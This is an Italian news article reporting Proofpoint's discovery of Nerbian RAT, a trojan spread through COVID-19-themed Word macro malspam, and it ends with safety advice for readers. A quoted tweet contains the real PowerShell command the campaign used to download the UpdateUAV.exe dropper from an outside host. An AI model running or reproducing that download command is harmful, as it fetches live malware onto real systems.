È stato scoperto un nuovo Remote Access Trojan (RAT) che sfrutta l'argomento COVID-19 per diffondersi tramite campagne malspam. Il trojan è noto come Nerbian RAT ed è stato scoperto dai ricercatori di Proofpoint. Il malware sfrutta le immagini dell'Organizzazione Mondiale della Sanità (OMS) per ingannare le vittime, e presenta delle sconcertanti capacità di elusione delle analisi.
Programmato nel linguaggio Go e compilato per i sistemi a 64 bit, Nerbian è un grado di installarsi su varie piattaforme, mentre le campagne per la sua diffusione hanno riguardato diversi settori.
Any ideas? - #WHO - #COVID19 themed lure
— proxylife (@pr0xylife) April 28, 2022
powershell IWR -Uri https://www.fernandestechnical.]com/pub/media/gitlog -OutFile C:\Users\Admin\AppData\Roaming\UpdateUAV.exehttps://t.co/cQf1KK6UEt pic.twitter.com/bAbXJRM0ti
Le e-mail inviate alle vittime contenevano un file di Word dannoso, a volte compresso in un archivio RAR: le macro contenute nel documento, una volta attivate, presentavano informazioni sulla sicurezza in caso di COVID-19, con misure da adottare l'auto-isolamento dei soggetti infetti. Il documento, però, esegue tramite file bat una PowerShell che a sua volta scarica un dropper Goland a 64 bit, denominato "UpdateUAV.exe". Il file scarica il RAT Nerbian e presenta un codice "cannibalizzato" da alcuni progetti GitHub.
Le funzioni supportate da Nerbian RAT includono un keylogger e uno strumento di acquisizione dello schermo, nonché un sistema di gestione delle comunicazioni tramite SSL. L'utente proxylife su Twitter ha segnalato il malware, che prende il nome da Don Chisciotte presentando il percorso del file e le immagini connesse all'OMS. La campagna ha avuto un volume molto ridotto, secondo i ricercatori di Proofpoint, ed è partita il 26 aprile 2022 colpendo diversi soggetti dislocati in Italia, Spagna e Regno Unito.
Nei periodi di estrema incertezza, come quelle che stiamo vivendo adesso, tra il proseguire della pandemia e il conflitto russo-ucraino, aumentano i tentativi di diffusione di malspam e altri malware come il ransomware, per questo motivo, consigliamo sempre ai nostri lettori di prestare particolare attenzione alle mail e ai messaggi sospetti, di tenere aggiornati i propri antivirus e assicurarsi di utilizzare password uniche e complesse, magari con l'aiuto di un password manager.